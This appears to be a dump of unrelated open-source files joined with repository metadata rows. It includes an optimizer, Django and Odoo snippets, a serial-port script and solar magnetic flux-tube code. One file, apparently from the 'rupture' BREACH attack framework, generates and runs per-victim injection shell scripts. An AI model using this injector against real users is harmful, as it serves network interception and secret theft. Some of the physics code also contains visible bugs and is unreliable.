m_t = scatter_add(m, indices, m_scaled_g_values)
# v_t = beta2 * v + (1 - beta2) * (g_t * g_t)
v = self.get_slot(var, "adam_v")
v_scaled_g_values = (grad * grad) * (1 - beta2_t)
v_t = state_ops.assign(v, v * beta2_t, use_locking=self._use_locking)
with ops.control_dependencies([v_t]):
v_t = scatter_add(v, indices, v_scaled_g_values)
v_sqrt = math_ops.sqrt(v_t)
var_update = state_ops.assign_sub(
var, lr * m_t / (v_sqrt + epsilon_t), use_locking=self._use_locking)
return control_flow_ops.group(*[var_update, m_t, v_t])
def _apply_sparse(self, grad, var):
return self._apply_sparse_shared(
grad.values,
var,
grad.indices,
lambda x, i, v: state_ops.scatter_add( # pylint: disable=g-long-lambda
x,
i,
v,
use_locking=self._use_locking))
def _resource_scatter_add(self, x, i, v):
with ops.control_dependencies(
[resource_variable_ops.resource_scatter_add(x.handle, i, v)]):
return x.value()
def _resource_apply_sparse(self, grad, var, indices):
return self._apply_sparse_shared(grad, var, indices,
self._resource_scatter_add)
def _finish(self, update_ops, name_scope):
# Update the power accumulators.
with ops.control_dependencies(update_ops):
beta1_power, beta2_power = self._get_beta_accumulators()
with ops.colocate_with(beta1_power):
update_beta1 = beta1_power.assign(
beta1_power * self._beta1_t, use_locking=self._use_locking)
update_beta2 = beta2_power.assign(
beta2_power * self._beta2_t, use_locking=self._use_locking)
return control_flow_ops.group(
*update_ops + [update_beta1, update_beta2], name=name_scope)
def _do_use_weight_decay(self, param_name):
"""Whether to use L2 weight decay for `param_name`."""
if not self._weight_decay_rate:
return False
# for r in self._include_in_weight_decay:
# if re.search(r, param_name) is not None:
# return True
if self._exclude_from_weight_decay:
for r in self._exclude_from_weight_decay:
if re.search(r, param_name) is not None:
tf.logging.info('Adam WD excludes {}'.format(param_name))
return False
return True
| 44.444444
| 85
| 0.64463
| 9,604
| 0.889259
| 0
| 0
| 0
| 0
| 0
| 0
| 1,890
| 0.175
|
552db8b8886012305a174d08f78e6a22fd0ea206
| 38
|
py
|
Python
|
tests/test_e2e.py
|
sasakalaba/drone-strike
|
92e1aa9a79347f2fdc336529b584206aa20e72d3
|
[
"Unlicense"
] | null | null | null |
tests/test_e2e.py
|
sasakalaba/drone-strike
|
92e1aa9a79347f2fdc336529b584206aa20e72d3
|
[
"Unlicense"
] | null | null | null |
tests/test_e2e.py
|
sasakalaba/drone-strike
|
92e1aa9a79347f2fdc336529b584206aa20e72d3
|
[
"Unlicense"
] | null | null | null |
from .base import BaseTestCase
pass
| 7.6
| 30
| 0.789474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
552fdd4ea7856ad8f238ffba4056d7b666e1d19e
| 1,559
|
py
|
Python
|
backend/breach/helpers/injector.py
|
Cancelll/rupture
|
cd87481717b39de2654659b7ff436500e28a0600
|
[
"MIT"
] | 184
|
2016-03-31T04:19:42.000Z
|
2021-11-26T21:37:12.000Z
|
backend/breach/helpers/injector.py
|
Cancelll/rupture
|
cd87481717b39de2654659b7ff436500e28a0600
|
[
"MIT"
] | 212
|
2016-03-31T04:32:06.000Z
|
2017-02-26T09:34:47.000Z
|
backend/breach/helpers/injector.py
|
Cancelll/rupture
|
cd87481717b39de2654659b7ff436500e28a0600
|
[
"MIT"
] | 38
|
2016-03-31T09:09:44.000Z
|
2021-11-26T21:37:13.000Z
|
from backend.settings import BASE_DIR
import os
import subprocess
import stat
rupture_dir = os.path.abspath(os.path.join(BASE_DIR, os.pardir))
client_dir = os.path.join(rupture_dir, 'client')
def inject(victim):
_create_client(victim)
_create_injection(victim)
_run_injection(victim)
def _create_client(victim):
realtimeurl = victim.realtimeurl
victimid = victim.id
with open(os.devnull, 'w') as FNULL:
p = subprocess.Popen(
[os.path.join(client_dir, 'build.sh'), str(realtimeurl), str(victimid)],
cwd=client_dir,
stdout=FNULL,
stderr=subprocess.PIPE
)
return p.wait()
def _create_injection(victim):
sourceip = victim.sourceip
victimid = victim.id
with open(os.path.join(client_dir, 'inject.sh'), 'r') as f:
injection = f.read()
injection = injection.replace('$1', str(sourceip))
inject_file = os.path.join(client_dir, 'client_{}/inject.sh'.format(victimid))
with open(inject_file, 'w') as f:
f.write(injection)
clientid_inject = inject_file
st = os.stat(clientid_inject)
os.chmod(clientid_inject, st.st_mode | stat.S_IEXEC)
def _run_injection(victim):
victimid = victim.id
clientid_dir = os.path.join(client_dir, 'client_{}'.format(victimid))
with open(os.devnull, 'w') as FNULL:
subprocess.Popen(
os.path.join(clientid_dir, 'inject.sh'),
shell=True,
cwd=client_dir,
stdout=FNULL,
stderr=subprocess.PIPE
)
| 25.557377
| 84
| 0.645285
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 88
| 0.056446
|
5530fb74fc5655f0d169fed9774ccb03f4699d79
| 952
|
py
|
Python
|
wagtail_client/utils.py
|
girleffect/core-integration-demo
|
c37a0d5183d16bec6245a41e12dd90691ffa7138
|
[
"BSD-3-Clause"
] | null | null | null |
wagtail_client/utils.py
|
girleffect/core-integration-demo
|
c37a0d5183d16bec6245a41e12dd90691ffa7138
|
[
"BSD-3-Clause"
] | 19
|
2018-02-06T08:56:24.000Z
|
2018-09-11T08:05:24.000Z
|
wagtail_client/utils.py
|
girleffect/core-integration-demo
|
c37a0d5183d16bec6245a41e12dd90691ffa7138
|
[
"BSD-3-Clause"
] | 2
|
2018-05-25T09:44:03.000Z
|
2021-08-18T12:07:47.000Z
|
from urllib.parse import urlencode
from django.conf import settings
from django.contrib.sites.shortcuts import get_current_site
def provider_logout_url(request):
"""
This function is used to construct a logout URL that can be used to log the user out of
the Identity Provider (Authentication Service).
:param request:
:return:
"""
site = get_current_site(request)
if not hasattr(site, "oidcsettings"):
raise RuntimeError(f"Site {site} has no settings configured.")
parameters = {
"post_logout_redirect_uri": site.oidcsettings.wagtail_redirect_url
}
# The OIDC_STORE_ID_TOKEN setting must be set to true if we want to be able to read
# it from the session.
if "oidc_id_token" in request.session:
parameters["id_token_hint"] = request.session["oidc_id_token"]
redirect_url = settings.OIDC_OP_LOGOUT_URL + "?" + urlencode(parameters, doseq=True)
return redirect_url
| 34
| 91
| 0.722689
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 423
| 0.444328
|
553261313f73826b4fd76c66eae4be0cde9803af
| 978
|
py
|
Python
|
connectToProteusFromMongo.py
|
erentts/Ignite-Greenhouse
|
328730399328936332b5c6f3f8dcd18bf56369b9
|
[
"MIT"
] | 4
|
2021-02-22T21:19:28.000Z
|
2021-05-03T14:19:18.000Z
|
connectToProteusFromMongo.py
|
erentts/Ignite-Greenhouse
|
328730399328936332b5c6f3f8dcd18bf56369b9
|
[
"MIT"
] | null | null | null |
connectToProteusFromMongo.py
|
erentts/Ignite-Greenhouse
|
328730399328936332b5c6f3f8dcd18bf56369b9
|
[
"MIT"
] | null | null | null |
import pymongo
import dns
import serial
from pymongo import MongoClient
import struct
cluster = MongoClient("")
serialPort = serial.Serial(port= "COM1", baudrate=9600 ,bytesize =8 , timeout =None, parity='N',stopbits=1)
db=cluster["<greenHouse>"]
collection = db["greenhouses"]
while serialPort.readline():
results = collection.find({"greenHouseName" : "SERA 1" })
for result in results:
targetTemperature = abs(int(result.get("targetTemperature")))
# declaring an integer value
int_val = targetTemperature
# converting to string
str_val = str(targetTemperature)
# converting string to bytes
byte_val = str_val.encode()
serialPort.write(byte_val)
getterThree = collection.update_one({"greenHouseName" : "SERA 1"},{"$set":{"targetTemperature" : targetTemperature }})
getter = collection.update_one({"greenHouseName" : "SERA 1"},{"$set":{"currentTemperature" : float(serialPort.read() + serialPort.read()) }})
| 31.548387
| 145
| 0.702454
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 261
| 0.266871
|
55333cbb250a399b054018a193b9449274e24d7c
| 837
|
py
|
Python
|
website_sale_cache/__manifest__.py
|
factorlibre/website-addons
|
9a0c7a238e2b6030d57f7a08d48816b4f2431524
|
[
"MIT"
] | 1
|
2020-03-01T03:04:21.000Z
|
2020-03-01T03:04:21.000Z
|
website_sale_cache/__manifest__.py
|
factorlibre/website-addons
|
9a0c7a238e2b6030d57f7a08d48816b4f2431524
|
[
"MIT"
] | null | null | null |
website_sale_cache/__manifest__.py
|
factorlibre/website-addons
|
9a0c7a238e2b6030d57f7a08d48816b4f2431524
|
[
"MIT"
] | 3
|
2019-07-29T20:23:16.000Z
|
2021-01-07T20:51:24.000Z
|
# Copyright 2017 Artyom Losev
# Copyright 2018 Kolushov Alexandr <https://it-projects.info/team/KolushovAlexandr>
# License MIT (https://opensource.org/licenses/MIT).
{
"name": """E-commerce Category Cache""",
"summary": """Use this module to greatly accelerate the loading of a page with a large number of product categories""",
"category": "Website",
"images": ["images/websale_cache.png"],
"version": "13.0.1.0.1",
"author": "IT-Projects LLC, Artyom Losev",
"support": "apps@itpp.dev",
"website": "https://www.it-projects.info",
"license": "Other OSI approved licence", # MIT
"price": 25.00,
"currency": "EUR",
"depends": ["website_sale", "website", "base_action_rule"],
"data": ["views.xml", "data/ir_action_server.xml", "data/base_action_rules.xml"],
"installable": False,
}
| 41.85
| 123
| 0.658303
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 692
| 0.826762
|
5537fd0769af5384988d439a528247d706c25d2b
| 848
|
py
|
Python
|
lumin/utils/mod_ver.py
|
choisant/lumin
|
c039136eb096e8f3800f13925f9325b99cf7e76b
|
[
"Apache-2.0"
] | 43
|
2019-02-11T16:16:42.000Z
|
2021-12-13T15:35:20.000Z
|
lumin/utils/mod_ver.py
|
choisant/lumin
|
c039136eb096e8f3800f13925f9325b99cf7e76b
|
[
"Apache-2.0"
] | 48
|
2020-05-21T02:40:50.000Z
|
2021-08-10T11:07:08.000Z
|
lumin/utils/mod_ver.py
|
choisant/lumin
|
c039136eb096e8f3800f13925f9325b99cf7e76b
|
[
"Apache-2.0"
] | 14
|
2019-05-02T15:09:41.000Z
|
2022-01-12T21:13:34.000Z
|
import pkg_resources
__all__ = []
def check_pdpbox():
try:
ver = pkg_resources.get_distribution("pdpbox").version
assert ver >= '0.2.0+13.g73c6966', f'''You have version {ver} of pdpbox. Use of this function requires pdpbox>=0.2.0+13.g73c6966, which is not currently
available from pypi. Please install from source via:\n
`git clone https://github.com/SauceCat/PDPbox.git && cd PDPbox && pip install -e .`'''
except pkg_resources.DistributionNotFound:
print('''Use of this function requires pdpbox>=0.2.0+13.g73c6966, which is not currently available from pypi. Please install from source via:\n
`git clone https://github.com/SauceCat/PDPbox.git && cd PDPbox && pip install -e .`''')
| 56.533333
| 160
| 0.602594
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 623
| 0.73467
|
553885dd25affc404a552785fdb6d4e6392000ff
| 18,526
|
py
|
Python
|
pysac/mhs_atmosphere/mhs_model/flux_tubes.py
|
SolarDrew/pysac
|
9fd86dd03966b7e7f90653a47a2ccca7964c83bc
|
[
"BSD-2-Clause"
] | null | null | null |
pysac/mhs_atmosphere/mhs_model/flux_tubes.py
|
SolarDrew/pysac
|
9fd86dd03966b7e7f90653a47a2ccca7964c83bc
|
[
"BSD-2-Clause"
] | null | null | null |
pysac/mhs_atmosphere/mhs_model/flux_tubes.py
|
SolarDrew/pysac
|
9fd86dd03966b7e7f90653a47a2ccca7964c83bc
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 11 11:37:39 2014
@author: sm1fg
Construct the magnetic network and generate the adjustments to the
non-magnetic atmosphere for mhs equilibrium.
"""
import os
import warnings
import numpy as np
import astropy.units as u
from scipy.interpolate import RectBivariateSpline
#============================================================================
# locate flux tubes and footpoint strength
#============================================================================
def get_flux_tubes(
model_pars,
coords,
option_pars
):
""" Obtain an array of x,y coordinates and corresponding vertical
component value for the photospheric magnetic field """
if model_pars['nftubes'] == 0:
xi, yi, Si = [[0.]]*u.Mm, [[0.]]*u.Mm, [[0.0]]*u.T # x,y,Bz(r=0,z=0)
else:
xi, yi, Si = (
u.Quantity([
[0.]] * model_pars['nftubes'], unit=u.Mm),
u.Quantity([
[0.]] * model_pars['nftubes'], unit=u.Mm),
u.Quantity([
[0.1/model_pars['nftubes']]] * model_pars['nftubes'],
unit=u.T),
)
# parameters for matching Mumford,Fedun,Erdelyi 2014
if option_pars['l_sunspot']:
Si = [[0.5]]*u.T # 128.5mT SI units
# parameters for matching Mumford,Fedun,Erdelyi 2014
if option_pars['l_mfe']:
Si = [[0.1436]]*u.T # 128.5mT SI units
elif option_pars['l_drewmod']:
Si = [[0.012]] * u.T
#Si = [[0.005]] * u.T
#Si = [[0.05]] * u.T
elif model_pars['model'] == 'drewtube':
Si = [[2.7]] * u.kG
#Si = [[0.001]] * u.T
# parameters for matching Gent,Fedun,Mumford,Erdelyi 2014
elif option_pars['l_single']:
Si = [[0.1]]*u.T # 100mT SI units
# parameters for matching Gent,Fedun,Erdelyi 2014 flux tube pair
elif option_pars['l_tube_pair']:
xi, yi, Si = (
u.Quantity([
[ 1.0],
[ 1.0],
[-0.95],
[-1.05]
], unit=u.Mm),
u.Quantity([
[ 0.00],
[ 0.00],
[ .15],
[-0.15]
], unit=u.Mm),
u.Quantity([
[ 50e-3],
[ 50e-3],
[ 50e-3],
[ 50e-3]
], unit=u.T)
)# 50mT SI
# parameters for matching Gent,Fedun,Erdelyi 2014 twisted flux tubes
elif option_pars['l_multi_twist']:
"""xi, yi, Si = (
u.Quantity([
[ 0.34],
[ 0.07],
[ .14],
[-0.31]
], unit=u.Mm),
u.Quantity([
[ 0.20],
[ 0.33],
[ 0.04],
[-0.34]
], unit=u.Mm),
u.Quantity([
[ 50e-3],
[ 50e-3],
[ 50e-3],
[ 50e-3]
], unit=u.T)
)# 50mT SI"""
xi, yi, Si = (u.Quantity([[0.34], [0.07], [0.14], [-0.31]], unit=u.Mm),
u.Quantity([[0.2], [0.33], [0.04], [-0.34]], unit=u.Mm),
u.Quantity([[50e-3], [50e-3], [50e-3], [50e-3]], unit=u.T))
elif option_pars['l_multi_netwk']:
xi, yi, Si = (
u.Quantity([
[0.]] * model_pars['nftubes'], unit=u.Mm),
u.Quantity([
[0.]] * model_pars['nftubes'], unit=u.Mm),
u.Quantity([
[0.5/model_pars['nftubes']]] * model_pars['nftubes'],
unit=u.T),
)
x1 = [-1.75, -0.75, 1.25, 1.00, -0.75]
y1 = [-1.00, 0.50, 0.50, -1.50, 1.70]
xi[ : 3] += x1[0] * u.Mm
xi[3 : 6] += x1[1] * u.Mm
xi[6 : 9] += x1[2] * u.Mm
xi[9 :12] += x1[3] * u.Mm
xi[12:15] += x1[4] * u.Mm
yi[ : 3] += y1[0] * u.Mm
yi[3 : 6] += y1[1] * u.Mm
yi[6 : 9] += y1[2] * u.Mm
yi[9 :12] += y1[3] * u.Mm
yi[12:15] += y1[4] * u.Mm
for xj in xi:
xj += np.random.uniform(-0.5,0.5) * u.Mm
for xj in yi:
xj += np.random.uniform(-0.5,0.5) * u.Mm
elif option_pars['l_multi_lanes']:
xi, yi, Si = (
u.Quantity([
[0.]] * model_pars['nftubes'], unit=u.Mm),
u.Quantity([
[0.]] * model_pars['nftubes'], unit=u.Mm),
u.Quantity([
[0.475/model_pars['nftubes']]] * model_pars['nftubes'],
unit=u.T),
)
x1 = [-2., -1.2, -0.4, 0.4, 1.2, 2.]
xi[ : 3] += x1[0] * u.Mm
xi[3 : 6] += x1[1] * u.Mm
xi[6 : 9] += x1[2] * u.Mm
xi[9 :12] += x1[3] * u.Mm
xi[12:15] += x1[4] * u.Mm
xi[16:18] += x1[5] * u.Mm
for xj in xi:
xj += np.random.uniform(-0.5,0.5) * u.Mm
for xj in yi:
xj += np.random.uniform(-0.25,0.25) * u.Mm
else:
raise ValueError("in get_flux_tubes axial parameters need to be defined")
return xi, yi, Si
#-----------------------------------------------------------------------------
#
def get_hmi_flux_tubes(
model_pars, option_pars,
indx,
dataset = 'hmi_m_45s_2014_07_06_00_00_45_tai_magnetogram_fits',
sunpydir = os.path.expanduser('~/sunpy/data/'),
savedir = os.path.expanduser('~/figs/hmi/'),
l_newdata = False
):
""" indx is 4 integers: lower and upper indices each of x,y coordinates
# dataset of the form 'hmi_m_45s_2014_07_06_00_00_45_tai_magnetogram_fits'
# """
from sunpy.net import vso
import sunpy.map
client = vso.VSOClient()
results = client.query(vso.attrs.Time("2014/07/05 23:59:50",
"2014/07/05 23:59:55"),
vso.attrs.Instrument('HMI'),
vso.attrs.Physobs('LOS_magnetic_field'))
if l_newdata:
if not os.path.exits(sunpydir):
raise ValueError("in get_hmi_map set 'sunpy' dir for vso data\n"+
"for large files you may want link to local drive rather than network")
client.get(results).wait(progress=True)
if not os.path.exits(savedir):
os.makedirs(savedir)
hmi_map = sunpy.map.Map(sunpydir+dataset)
#hmi_map = hmi_map.rotate()
#hmi_map.peek()
s = hmi_map.data[indx[0]:indx[1],indx[2]:indx[3]] #units of Gauss Bz
s *= u.G
nx = s.shape[0]
ny = s.shape[1]
nx2, ny2 = 2*nx, 2*ny # size of interpolant
#pixel size in arc seconds
dx, dy = hmi_map.scale.items()[0][1],hmi_map.scale.items()[1][1]
x, y = np.mgrid[
hmi_map.xrange[0]+indx[0]*dx:hmi_map.xrange[0]+indx[1]*dx:1j*nx2,
hmi_map.xrange[0]+indx[2]*dy:hmi_map.xrange[0]+indx[3]*dy:1j*ny2
]
#arrays to interpolate s from/to
fx = u.Quantity(np.linspace(x.min().value,x.max().value,nx), unit=x.unit)
fy = u.Quantity(np.linspace(y.min().value,y.max().value,ny), unit=y.unit)
xnew = u.Quantity(np.linspace(x.min().value,x.max().value,nx2), unit=x.unit)
ynew = u.Quantity(np.linspace(y.min().value,y.max().value,ny2), unit=y.unit)
f = RectBivariateSpline(fx,fy,s.to(u.T))
#The initial model assumes a relatively small region, so a linear
#Cartesian map is applied here. Consideration may be required if larger
#regions are of interest, where curvature or orientation near the lim
#of the surface is significant.
s_int = f(xnew,ynew) #interpolate s and convert units to Tesla
s_int /= 4. # rescale s as extra pixels will sum over FWHM
x_int = x * 7.25e5 * u.m #convert units to metres
y_int = y * 7.25e5 * u.m
dx_int = dx * 7.25e5 * u.m
dy_int = dy * 7.25e5 * u.m
FWHM = 0.5*(dx_SI+dy_SI)
smax = max(abs(s.min()),abs(s.max())) # set symmetric plot scale
cmin = -smax*1e-4
cmax = smax*1e-4
#
# filename = 'hmi_map'
# import loop_plots as mhs
# mhs.plot_hmi(
# s*1e-4,x_SI.min(),x_SI.max(),y_SI.min(),y_SI.max(),
# cmin,cmax,filename,savedir,annotate = '(a)'
# )
# filename = 'hmi_2x2_map'
# mhs.plot_hmi(
# s_SI*4,x_SI.min(),x_SI.max(),y_SI.min(),y_SI.max(),
# cmin,cmax,filename,savedir,annotate = '(a)'
# )
#
# return s_SI, x_SI, y_SI, nx2, ny2, dx_SI, dy_SI, cmin, cmax, FWHM
#============================================================================
# Magnetic Field Construction (See. Fedun et.al 2011)
#============================================================================
def construct_magnetic_field(
x, y, z,
x0, y0, S,
model_pars,
option_pars,
physical_constants,
scales):
""" Construct self similar magnetic field configuration
Note if model_pars['B_corona'] = 0 then paper3 results otherwise paper 2
"""
#Extract commonly used scales:
z1 = model_pars['photo_scale']
z2 = model_pars['chrom_scale']
z3 = model_pars['corona_scale']
f0 = model_pars['radial_scale']
mu0 = physical_constants['mu0']
g0 = physical_constants['gravity']
#scale Bf1, Bf2 to sum to 1
Bf1 = model_pars['phratio']
Bf2 = model_pars['chratio']
Bf3 = model_pars['coratio']
Bbz = model_pars['B_corona']
#define exponentials and derivatives, basis functions
if option_pars['l_B0_expz']:
B1z = Bf1 * np.exp(-z**2/z1**2)
B2z = Bf2 * np.exp(-z/z2)
B3z = Bf3 * np.exp(-z/z3)
B0z = B1z + B2z + B3z
B10dz= -2*z*B1z/z1**2 - B2z/z2 - B3z/z3
B20dz= -2* B1z/z1**2 + 4*z**2*B1z/z1**4 + B2z/z2**2 + B3z/z3**2
B30dz= 12*z*B1z/z1**4 - 8*z**3*B1z/z1**6 - B2z/z2**3 - B3z/z3**3
elif option_pars['l_B0_rootz']:
B0z = Bf2 * z2**(0.125) / (z + z2)**(0.125)
B10dz = -0.125 * B0z / (z + z2)
B20dz = 9./64. * B0z / (z + z2)**2
B30dz = -153./512 * B0z / (z + z2)**3
elif option_pars['l_B0_quadz']:
B1z = Bf1 * z1**2 / (z**2 + z1**2)
B2z = Bf2 * z2 /(z + z2)
B3z = Bf3 * np.exp(-z/z3)# B3z = Bf3 * z3 /(z + z3)
B0z = B1z + B2z + B3z
B10dz=- 2 * z *B1z**2/z1**2 - B2z**2/z2 - B3z/z3
B20dz= 8*z**2*B1z**3/z1**4 - 2* B1z**2/z1**2 +2*B2z**3/z2**2 +2*B3z/z3**2
B30dz=-48*z**3*B1z**4/z1**6 +24*z*B1z**3/z1**4 -6*B2z**4/z2**3 -6*B3z/z3**3
else:
raise ValueError("in mhs_model.flux_tubes.construct_magnetic_field \
option_pars all False for axial strength Z dependence")
rr= np.sqrt((x-x0)**2 + (y-y0)**2)
#self similarity functions
fxyz= -0.5*rr**2 * B0z**2
G0 = np.exp(fxyz/f0**2)
#Define Field
B0z2 = B0z*B0z
Bx = -S * (x-x0) * (B10dz * B0z * G0)
By = -S * (y-y0) * (B10dz * B0z * G0)
Bz = S * B0z2 * G0 + Bbz
f02 = f0*f0
G02 = G0*G0
B0z3 = B0z2*B0z
# B0z4 = B0z3*B0z
B10dz2 = B10dz**2
#Define derivatives of Bx
dxBx = - S * (B10dz * B0z * G0) + 2 * S * (x-x0)**2 * B10dz * B0z3 * G0/f02
dyBx = 2 * S * (x-x0) * (y-y0) * B10dz * B0z3 * G0/f02
dzBx = - 2 * S * (x-x0) * (B0z*B20dz + (1. + 2.*fxyz/f02)*B10dz2)*G0
#Define derivatives By
dyBy = - S * (B10dz * B0z * G0) \
+ 2 * S * (y-y0)**2 * B10dz * B0z3 * G0/f02
dxBy = 2 * S * (x-x0) * (y-y0) * B10dz * B0z3 * G0/f02
dzBy = - 2 * S * (y-y0) * (B0z*B20dz + (1. + 2.*fxyz/f02)*B10dz2)*G0
#Magnetic Pressure and horizontal thermal pressure balance term
pbbal= -0.5*Bz**2/mu0 + 0.5/mu0 * S**2 * G02 * (
f02 * B0z * B20dz + 2 * fxyz * B10dz2) + S*Bbz*G0/mu0 * (
f02 * B20dz / B0z + (2 * fxyz - f02) * B10dz2 / B0z2)
#density balancing B
# import pdb; pdb.set_trace()
del rr, x, y, z
rho_1 = S**2*G02/(mu0*g0) * (
(0.5*f02 + 2*fxyz) * B10dz*B20dz + 0.5*f02 * B0z*B30dz
- 2. * B0z3*B10dz
) + S*Bbz*G0/(mu0*g0) * (f02*B30dz/B0z + (2*f02 - 2*fxyz +
4*fxyz**2/f02) * B10dz2*B10dz/B0z3 +
3 * (2*fxyz - f02) * B20dz*B10dz/B0z2
- 2 * (fxyz/f02 + 1) * B10dz*B0z )
B2x = (Bx * dxBx + By * dyBx + Bz * dzBx)/mu0
B2y = (Bx * dxBy + By * dyBy + Bz * dzBy)/mu0
return pbbal, rho_1, Bx, By, Bz, B2x, B2y
#============================================================================
# Magnetic Field Construction (See. Fedun et.al 2011)
#============================================================================
def construct_pairwise_field(x, y, z,
xi, yi,
xj, yj,
Si, Sj,
model_pars,
option_pars,
physical_constants,
scales
):
""" Construct self similar magnetic field configuration """
#Extract commonly used scales:
z1 = model_pars['photo_scale']
z2 = model_pars['chrom_scale']
z3 = model_pars['corona_scale']
f0 = model_pars['radial_scale']
mu0 = physical_constants['mu0']
g0 = physical_constants['gravity']
#scale Bf1, Bf2 to sum to 1
Bf1 = model_pars['phratio']
Bf2 = model_pars['chratio']
Bf3 = model_pars['coratio']
Bbz = model_pars['B_corona']
#define exponentials and derivatives, basis functions
if option_pars['l_B0_expz']:
B1z = Bf1 * np.exp(-z**2/z1**2)
B2z = Bf2 * np.exp(-z/z2)
B3z = Bf3 * np.exp(-z/z3)
B0z = B1z + B2z + B3z
B10dz= -2*z*B1z/z1**2 - B2z/z2 - B3z/z3
B20dz= -2* B1z/z1**2 + 4*z**2*B1z/z1**4 + B2z/z2**2 + B3z/z3**2
B30dz= 12*z*B1z/z1**4 - 8*z**3*B1z/z1**6 - B2z/z2**3 - B3z/z3**3
else:
#if option_pars['l_BO_quadz']:
B1z = Bf1 * z1**2 / (z**2 + z1**2)
B2z = Bf2 * z2 /(z + z2)
B3z = Bf3 * np.exp(-z/z3)
# B3z = Bf3 * z3 /(z + z3)
B0z = B1z + B2z + B3z
B10dz=- 2 * z *B1z**2/z1**2 - B2z**2/z2 - B3z/z3
B20dz= 8*z**2*B1z**3/z1**4 - 2* B1z**2/z1**2 +2*B2z**3/z2**2 +2*B3z/z3**2
B30dz=-48*z**3*B1z**4/z1**6 +24*z*B1z**3/z1**4 -6*B2z**4/z2**3 -6*B3z/z3**3
B10dz2 = B10dz**2
BB10dz = B10dz*B0z
BB10dz2 = BB10dz**2
BB20dz = B20dz*B0z
B0z2 = B0z*B0z
# B30dz= -B1z/z1**3 - B2z/z2**3
ri= np.sqrt((x-xi)**2 + (y-yi)**2)
rj= np.sqrt((x-xj)**2 + (y-yj)**2)
ri2 = ri**2
rj2 = rj**2
#self similarity functions
fxyzi= -ri2 * B0z2/2.
fxyzj= -rj2 * B0z2/2.
f02 = f0*f0
G0i = np.exp(fxyzi/f02)
G0j = np.exp(fxyzj/f02)
G0ij = G0i*G0j
#Define Field
Bxi = -Si * (x-xi) * (B10dz * B0z * G0i)
Byi = -Si * (y-yi) * (B10dz * B0z * G0i)
Bzi = Si * B0z**2 * G0i + Bbz
Bxj = -Sj * (x-xj) * (B10dz * B0z * G0j)
Byj = -Sj * (y-yj) * (B10dz * B0z * G0j)
Bzj = Sj * B0z**2 * G0j + Bbz
B0z3 = B0z2*B0z
B0z4 = B0z3*B0z
BdB2 = B10dz2/B0z2
B2dB = B20dz/B0z
#Magnetic Pressure and horizontal thermal pressure balance term
pbbal= - Bzi*Bzj/mu0 - Si*Sj*G0ij*f02*(B10dz2 + BB20dz)/mu0 \
+ Bbz*Si*G0i * ((2*fxyzi - f02) * BdB2 + f02 * B2dB) /mu0 \
+ Bbz*Sj*G0j * ((2*fxyzj - f02) * BdB2 + f02 * B2dB) /mu0
#density balancing B
rho_1 = \
2.*Si*Sj*G0ij*BB10dz/(mu0*g0)*(
+ (fxyzi + fxyzj) * (BdB2 + B2dB)
- ((fxyzi + fxyzj)/f02 + 2.) * B0z2
+ 0.5*f02 * (3.*B2dB + B30dz/B10dz)
+((x-xi)*(x-xj) + (y-yi)*(y-yj)) * ((
1. + (fxyzi + fxyzj)/f02) * B10dz2 + BB20dz - B0z4/f02)
) + Bbz*Si*G0i/(mu0*g0) * (B30dz/B0z*f02 - 2*(fxyzi/f02 + 1) *
BB10dz + (4*fxyzi**2/f02 - 2*fxyzi + 2*f02) * B10dz2*B10dz/B0z3
+ (6*fxyzi - 3*f02) * B10dz*B20dz/B0z2
) + Bbz*Sj*G0j/(mu0*g0) * (B30dz/B0z*f02 - 2*(fxyzj/f02 + 1) *
BB10dz + (4*fxyzj**2/f02 - 2*fxyzj + 2*f02) * B10dz2*B10dz/B0z3
+ (6*fxyzj - 3*f02) * B10dz*B20dz/B0z2
)
Fx = - 2*Si*Sj/mu0 * G0ij*BB10dz2/f02 * (
(x-xi) * fxyzi + (x-xj) * fxyzj )
Fy = - 2*Si*Sj/mu0 * G0ij*BB10dz2/f02 * (
(y-yi) * fxyzi + (y-yj) * fxyzj )
#Define derivatives of Bx
dxiBx = - Si * (BB10dz * G0i) \
+ 2 * Si * (x-xi)**2 * B10dz * B0z3 * G0i/f02
dyiBx = 2 * Si * (x-xi) * (y-yi) * B10dz * B0z3 * G0i/f02
dziBx = - Si * (x-xi) * (B0z*B20dz + (1. + 2.*fxyzi/f02)*B10dz2)*G0i
dxjBx = - Sj * (BB10dz * G0j) \
+ 2 * Sj * (x-xj)**2 * B10dz * B0z3 * G0j/f02
dyjBx = 2 * Sj * (x-xj) * (y-yj) * B10dz * B0z3 * G0j/f02
dzjBx = - Sj * (x-xj) * (B0z*B20dz + (1. + 2.*fxyzj/f02)*B10dz2)*G0j
#Define derivatives By
dxiBy = - Si * (BB10dz * G0i) \
+ 2 * Si * (y-yi)**2 * B10dz * B0z3 * G0i/f02
dyiBy = 2 * Si * (x-xi) * (y-yi) * B10dz * B0z3 * G0i/f02
dziBy = - Si * (y-yi) * (B0z*B20dz + (1. + 2.*fxyzi/f02)*B10dz2)*G0i
dxjBy = - Sj * (BB10dz * G0j) \
+ 2 * Sj * (y-yj)**2 * B10dz * B0z3 * G0j/f02
dyjBy = 2 * Sj * (x-xj) * (y-yj) * B10dz * B0z3 * G0j/f02
dzjBy = - Sj * (y-yj) * (B0z*B20dz + (1. + 2.*fxyzj/f02)*B10dz2)*G0j
B2x = (Bxi * dxjBx + Byi * dyjBx + Bzi * dzjBx
+ Bxj * dxiBx + Byj * dyiBx + Bzj * dziBx)/mu0
B2y = (Bxi * dxjBy + Byi * dyjBy + Bzi * dzjBy
+ Bxj * dxiBy + Byj * dyiBy + Bzj * dziBy)/mu0
return pbbal, rho_1, Fx, Fy, B2x, B2y
| 40.986726
| 83
| 0.45428
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 5,243
| 0.283008
|
5539d275ebd36d43b5d44642306d4d9d488a83a3
| 961
|
py
|
Python
|
s3_file_uploads/serializers.py
|
dabapps/django-s3-file-uploads
|
17ed6b4e02bd43bc925af987ff5bf971a82da434
|
[
"BSD-3-Clause"
] | 5
|
2019-05-27T03:51:30.000Z
|
2021-03-19T11:24:09.000Z
|
s3_file_uploads/serializers.py
|
dabapps/django-s3-file-uploads
|
